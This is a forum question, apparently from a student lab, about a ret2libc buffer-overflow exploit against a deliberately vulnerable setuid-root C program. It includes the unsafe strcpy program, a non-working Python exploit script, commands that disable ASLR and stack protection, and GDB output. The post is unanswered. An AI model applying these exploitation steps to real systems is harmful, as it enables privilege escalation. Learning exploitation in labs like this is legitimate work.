Open a shell from buffer overflow
I have to open a shell in a c program with a exploit python script. I am using a Ubuntu VM to do this.
The c program:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buf[256];
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}
So far I have created an exploit.py:
#!/usr/bin/env python
import struct
padding = "A"*(10)+"B"*(10)+"C"*(10)+"D"*(10)+"E"*(10)+"F"*(10)+"G"*(10)+"H"*(10)+"I"*(10)+"J"*(10)+"K"*(10)+"L"*(10)+"M"*(10)+"N"*(10)+"O"*(10)+"P"*(10)+"Q"*(10)+"R"*(10)+"S"*(10)+"T"*(10)+"U"*(10)+"V"*(10) +"W"*(10)+"X"*(10)+"Y"*(10)+"Z"*(7)
system = struct.pack("I", 0x0000060d)
return_after_system = "AAAA"
bin_sh = struct.pack("I",0xf7f61e8b)
print padding + system + return_after_system + bin_sh
I found the /bin/sh address and I verified it was the correct address then I packed the structs.
I run the following commands before I run the code to compile it and such
sudo sysctl -w kernel.randomize_va_space=0
gcc -m32 -g -fno-stack-protector -o vulnerable -z execstack vulnerable.c
sudo chown root:root vulnerable
sudo chmod u+s vulnerable
Then I run the program like so
./vulnerable `python exploit.py`
However it just outputs the following without the shell
OUTPUT: AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHHHHHHHHHHIIIIIIIIIIJJJJJJJJJJKKKKKKKKKKLLLLLLLLLLMMMMMMMMMMNNNNNNNNNNOOOOOOOOOOPPPPPPPPPPQQQQQQQQQQRRRRRRRRRRSSSSSSSSSSTTTTTTTTTTUUUUUUUUUUVVVVVVVVVVWWWWWAAAA���XXXXXXYYYYYYYYYYZZZZZZZ Segmentation fault (core dumped)
The following is what I got from GDB for the vulnerable program
0x000005b0 <+0>: lea ecx,[esp+0x4]
0x000005b4 <+4>: and esp,0xfffffff0
0x000005b7 <+7>: push DWORD PTR [ecx-0x4]
0x000005ba <+10>: push ebp
0x000005bb <+11>: mov ebp,esp
0x000005bd <+13>: push ebx
0x000005be <+14>: push ecx
0x000005bf <+15>: sub esp,0x100
0x000005c5 <+21>: call 0x480 <__x86.get_pc_thunk.bx>
0x000005ca <+26>: add ebx,0x1a06
0x000005d0 <+32>: mov eax,ecx
0x000005d2 <+34>: mov eax,DWORD PTR [eax+0x4]
0x000005d5 <+37>: add eax,0x4
0x000005d8 <+40>: mov eax,DWORD PTR [eax]
0x000005da <+42>: sub esp,0x8
0x000005dd <+45>: push eax
0x000005de <+46>: lea eax,[ebp-0x108]
0x000005e4 <+52>: push eax
0x000005e5 <+53>: call 0x418
0x000005ea <+58>: add esp,0x10
0x000005ed <+61>: sub esp,0xc
0x000005f0 <+64>: lea eax,[ebp-0x108]
0x000005f6 <+70>: push eax
0x000005f7 <+71>: call 0x420
0x000005fc <+76>: add esp,0x10
0x000005ff <+79>: mov eax,0x0
0x00000604 <+84>: lea esp,[ebp-0x8]
0x00000607 <+87>: pop ecx
0x00000608 <+88>: pop ebx
0x00000609 <+89>: pop ebp
0x0000060a <+90>: lea esp,[ecx-0x4]
0x0000060d <+93>: ret
I think the system variable in the exploit.py file does not have the correct address but I do not know what the correct address is to change the base pointer and return address. I feel like I have the correct number of padding variables because when I ran the GDB it listed the ebp and eip as 0 when the program ended with padding alone
eax 0x0 0
ecx 0xffff005a -65446
edx 0xf7fba870 -134502288
ebx 0x0 0
esp 0xffff005a 0xffff005a
ebp 0x0 0x0
esi 0xf7fb9000 -134508544
edi 0xf7fb9000 -134508544
eip 0x0 0x0
eflags 0x10282 [ SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
I would love any tips or suggestions I have been following youtube guides and other online resources but I am having trouble figuring it out. Thank you!
anon0 Answers
Nobody has answered this question yet.
User contributions licensed under CC BY-SA 3.0